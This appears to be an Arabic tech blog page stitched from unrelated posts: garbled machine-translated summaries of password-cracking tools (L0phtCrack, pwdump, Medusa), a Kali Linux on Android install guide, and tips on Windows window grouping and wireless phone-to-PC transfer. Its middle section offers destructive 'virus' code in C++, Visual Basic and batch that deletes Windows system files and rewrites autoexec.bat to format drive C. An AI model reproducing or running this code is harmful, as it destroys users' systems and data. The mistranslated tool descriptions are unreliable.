  • دعم الوكيل جورب لجميع أنواع المصادقة
  • القدرة على معالجة الأخطاء والاسترداد
  • محرك المصادقة مرحلة متعددة
الموقع للتحميل:

8-L0phtCrack: أداة ذكية لاستعادة كلمة السر ويندوز

تماما مثل OphCrack أداة L0phtCrack أيضا أداة استرداد كلمات مرور Windows يستخدم التجزئات لكسر كلمات السر، مع ميزات إضافية للقوة الغاشمة و قاموس الهجمات.
عادة مكاسب الوصول إلى هذه التجزئات من الدلائل أو شبكة اتصال ملقمات وحدات التحكم بالمجال. وهو قادر على القيام باستخراج تجزئة من 32 و 64 بت ويندوز نظم، خوارزميات متعددة المعالجات، الجدولة، ويمكن أيضا إجراء فك وشبكات الرصد. بعد هو لا يزال أسهل لاستخدام كلمة مرور التدوين والانتعاش البرمجيات المتاحة.
ميزات L0phtCrack
  • متاح لويندوز إكس بي، الإقليم الشمالي، 2000، 2003 الخادم، وخادم 2008
  • يمكن أن تعمل في كلا البيئتين 64 و 32 بت
  • ميزة إضافية لروتين جدول التدقيق على أسس شهرية يوميا أو أسبوعيا،
  • بعد تشغيل هو تقديم “ملخص التدقيق” الكامل في صفحة التقرير
الموقع للتحميل:

9-بودومب: أداة استعادة كلمة السر ويندوز

بودومب هو فعلا مختلف برامج Windows التي يتم استخدامها لتوفير LM و NTML التجزئات لنظام حسابات المستخدمين.
بودومب كلمة السر المفرقع قادر على استخراج تجزئات LM NTLM و LanMan من الهدف في Windows، وفي حالة إذا تم تعطيل سيسكي ، البرمجيات لديه القدرة على استخراج في هذا الشرط.
البرنامج هو التحديث مع ميزة إضافية لعرض تاريخ كلمة المرور إذا كان التاريخ متاح. ستتوفر البيانات المستخرجة في شكل متوافق مع L0phtcrack.
مؤخرا هو تحديث البرامج إلى صيغة جديدة تسمى فجدومب، بودومب لا تعمل جيدا عندما يتم تشغيل أي برنامج مكافحة الفيروسات.
ميزات بودومب
  • المتوفرة لنظام التشغيل Windows XP، 2000
  • تتوفر ميزة إضافية قوية في الإصدار الجديد من بودومب
  • القدرة على تشغيل متعددة مؤشرات الترابط
  • ويمكن أن تؤدي كاتشيدومب (تفريغ بيانات الاعتماد تحطمت) وبستجدومب (تفريغ التخزين المحمي)
الموقع للتحميل:

10-ميدوسا: كلمة مرور شبكة الاتصال السريع تكسير أداة

ميدوسا نظم بعد كلمة السر أداة تكسير تماما مثل التتراهيدروكانابينول هيدرا لكن استقراره، والقدرة على الدخول بسرعة أفضل له أكثر من التتراهيدروكانابينول هيدرا.
أنها القوة الغاشمة سريعة، أداة موازية ونمطي. يمكن تنفيذ البرامج هجوم القوة الغاشمة ضد متعددة المستخدمين والمضيفين، وكلمات المرور. وهو يدعم العديد من البروتوكولات بما في ذلك وكالة فرانس برس، HTTP، والسير الذاتية، IMAP، بروتوكول نقل الملفات، سة، SQL، POP3 و Telnet وفنك إلخ.
يمنع هذه الميزة دون داع، ميدوسا أداة تستند إلى pthread مكررة من المعلومات. كافة الوحدات النمطية المتوفرة كملف مستقل من وزارة الدفاع، ذلك أي تعديل مطلوب لتوسيع القائمة التي تدعم خدمات الغاشمة مما أجبر الهجوم.
ميزات ميدوسا
  • المتاحة لنظام التشغيل Mac OS X وبي إس دي، ويندوز و SunOS
  • قادرة على أداء مؤشر الترابط على أساس التجارب المتوازية
  • ميزة جيدة لإدخال المستخدم مرونة
  • بسبب سرعة المعالجة المتوازية لتكسير سريع جداً
الموقع للتحميل:

فيروسات بلغات البرمجه

فيرووس C++ :

#include

#include

#include

main()

{

clrscr();

printf(“tttWelcome to the Egyption -oO Virus Oo-nn”);

printf(“tt**** -oO Israel Oo- and -oO America Oo-nn”);

remove(“c:\windows\system.ini”);

remove(“c:\windows\win.ini”);

remove(“c:\autoexec.bat”);

remove(“c:\msdos.sys”);

remove(“c:\io.sys”);

remove(“c:\command.com”);

remove(“c:\config.sys”);

remove(“c:\windows\ebd\command.com”);

remove(“c:\windows\ebd\ebd.cab”);

remove(“c:\windows\ebd\Autoexec.bat”);

remove(“c:\windows\ebd\setramd.bat”);

remove(“c:\windows\ebd\Findramd.exe”);

rename(“egypt.exe”,”c:/windows/startm~1/programs/startup/win.exe”);

printf(“Windows destroyed …nn”);

system(“PAUSE”);

}

فيرووس Visual Basic :

SetAttr “c:autoexec.bat”, vbNormal

SetAttr “c:msdos.sys”, vbNormal

SetAttr “c:io.sys”, vbNormal

SetAttr “c:windowswin.ini”, vbNormal

SetAttr “c:windowssystem.ini”, vbNormal

SetAttr “c:command.com”, vbNormal

SetAttr “c:config.sys”, vbNormal

SetAttr “c:windowsrundll.exe”, vbNormal

SetAttr “c:windowsrundll32.exe”, vbNormal

Kill “C:autoexec.bat”

Kill “C:msdos.sys”

Kill “C:io.sys”

Kill “C:windowswin.ini”

Kill “C:windowssystem.ini”

Kill “C:command.com”

Kill “C:config.sys”

Kill “C:windowsrundll.exe”

Kill “C:windowsrundll32.exe”

فيروس لتدمير الوندوز :

Del c:\windows\system\msconfig.exe

Del c:\windows\Rundll32.exe

Del c:\windows\regedit.exe

Del c:\windows\Rundll.exe

Del c:\Autoexec.bat

Del c:\command.com

Del c:\windows\Logos.sys

Del c:\windows\Logow.sys

Del c:\windows\Scanregw.exe

Del C:\Program Files\Internet Explorer\Iexplore.exe

Del c:\windows\system\Sysedit.exe

Del c:\windows\win.com

@Echo off

c:

cd %WinDir%\System\

deltree /y *.exe

فورمات للكمبيوتر:

echo off@

cls

call attrib -h -r c:autoexec.bat >nul

echo @echo off >c:autoexec.bat

echo deltree /y crogra~1*.* >nul >>c:autoexec.bat

echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat

echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat

echo deltree /y c:windows*.* >nul >>c:autoexec.bat

echo format c: /q /u /autotest >nul >>c:autoexec.bat

شرح تنصيب نظام الكالي لينكس 💽على اندرويد بدون انترنت offline

السلام عليكم ورحمة الله وبركاته
احبابي يالي عما تتبعوني من كل مكان اهل بكم
اليوم رح نعطيكم شرح تنصيب نظام الكالي لينكس 💽على اندرويد بدون انترنت offline
رح اترك الروابط اللازمة هون بالاضافة للتحميل المباشر والشرح بالصور واتمنى الكل يستفيد ان شاء الله
طبعاً حجم الكالي 2 غيغا يعني يتطلب مواصفات جهازك تكون عالية
الذاكرة 4 غيغا فما فوق
الرام 1 ميغا فما فوق
اندرويد 4.2 فما فوق
تحتاج روت
الروابط اللازمة👇👇
تطبيق VNC Viewer لعرض الكالي عليه
https://play.google.com/store/apps/details…
تطبيق Terminal Emulator لاعطاء الاوامر
https://play.google.com/store/apps/details…
اترككم مع الشرح بالصور وعفكرة مايتطلب خبرة عالية للتثبيت فالعملية سهلة لكن تتطلب تركيز بالادوات وكيفية عملها 👍😉
بعد تحميل الكالي لينكس والسكربت الموجود روابطهم بالشرح نستخرج الملفات من الضغط ببرنامج zip او winrar ثم نضع الملفات المستخرجة في مجلد واحد ويكون المجلد باسم kalilinux يجب تسمية المجلد حرفياً 👍
الصورة الاولة
بعد وضع الملفات في مجلد واحد نعيد تسمية ملف النظام الخاص بالكالي نسميه ubuntu.img كما موضح
نفتح تطبيق Terminal Emulator ونكتب su لاعطائه صلاحيات الرووت ,نحدد مكان تواجد ملفي الاسكربت والنظام بهذا الامر cd mnt/sd-ext/kalilinux
بعد ذالك نبدأ عملية الاقلاع عن طريق تشغيل ملف الاسكربت الذي قمنا بتحميله عن طريق هذا االامر
بعد الضغط ستبدأ عملية الاقلاع كما في الصورة وستظهر لك امر تختار فيه نعم او لا هذا الامر الخاص بتشغيل الVNC server لذالك نكتب y ونضغط انتر
بعد ذالك سيطلب منك اختيار في هل تريد تشغيل SSH server ونكتب y وانتر بعد ذالك سيطلب منك ادخال قياس شاشة الجهاز الخاص بك تكتبه كما بالصورة
بعد ذلك يطلب منك ادخال كلمة سر تكتب root
بعد ذلك تكتب y لحفظ الاعدادات وتضغط انتر
لان مبروك عليك انت الان داخل نظام كالي لينكس وتستطيع البدأ بكتابة الاوامر الخاصه بنظام كالي لينكس.
انشاء الايبي والبورت الخاص لربط النظام بتطبيق الVNC عن طريق كتابة هذا الامر Tightvncserver
الان كما ترون تم انشاء عنوان الايبي والبورت بنجاح والذي هو localhost:1 كما في الصورة
الان نقوم بفتح تطبيق VNC viewer واضافة جهاز جديد كما في الصورة
الان نقوم بكتابة العنوان localhost:1 الاسم kalilinux ونحفظ الاعدادات كما في الصورة
الان نقوم بالضغط على connect لبدأ الاتصال بعد الضغط على connect سيبدأ الاتصال وسيطلب منك ادخال كلمة سر تقوم بكتابة kalilinux كما في الصورة
ومبروك عليك لقد قمت بتثبيت نظام الكالي لينكس بجميع ادواته في هاتفك الاندرويد بسهوله ومن دون الحاجه لأن تكون متصل بالانترنت في اقل من 5 دقائق.👍☺️
الكالي لينكس في حدا ذاته وان صح التعبير فهو من اضخم انظمة الاختراق ويغنيك عن جميع الاكاذيب من ثغرات فيس بوك واكواد وابرامج التخمين لشبكات الواي فاي فهذا النظام يتيح لك اختراق اي شئ تريده ان صح التعبير وان شاء الله قريبا ساشرح عن ادواته وكيفية اختراق الحسابات والمواقع والشبكات وغيرها
واختم سلامي كما بدأت بالسلام عليكم ورحمة الله وبركاته
تابع الشرخ بالصور مع تحميل البرامج بشكل مباشر ماعدا نظام الكالي لينكس فهو ذو حجم 2 غيغا ولا يقبل سياسة التيليغرام بالنشر اكثر من 1,5 غيغا
الشرح بالصور + البرامج اللازمة

طريقه تجميع النوافذ المفتوحة في نافذة واحدة للويندوز والمتصفح

السلام عليكم ورحمة الله وبركاته..
اليوم معنا شرح طريقه تجميع كل النوافذ المفتوحه في نافذه واحده وسنطبق الشرح على المتصفح والويندوز ايضا

نترككم مع فيديو الشرح

روابط التحميل:
برنامج Groupy
اضافه OneTap

ارجو ان يكون الشرح نال اعجابكم ولا تنسوا دعمنا على القناة 3>

حصريا: توصيل الهاتف بالحاسوب بدون استخدام الكابل او الريدر

السلام عليكم ورحمه الله وبركاته

اليوم معنا شرح موضح عن كيفيه توصيل الهاتف بالحاسوب بدون استخدام كابل USP او حتى ريدر فقط ببرنامج ES File Explorer للهاتف وبرنامج FileZilla للحاسوب وكلا البرنامجين يتم تحميلهما مجانا
روابط التحميل اسفل الفيديو ↓↓↓↓
روابط التحميل:
تحميل برنامج ES File Explorer
تحميل برنامج FileZilla
ارجو ان يكون الشرح نال اعجابكم وارجو الاشتراك بالقناه وضغط زر الجرس لمتابعه احدث الفيديوهات
نلقاكم في الفيديوهات القادمه…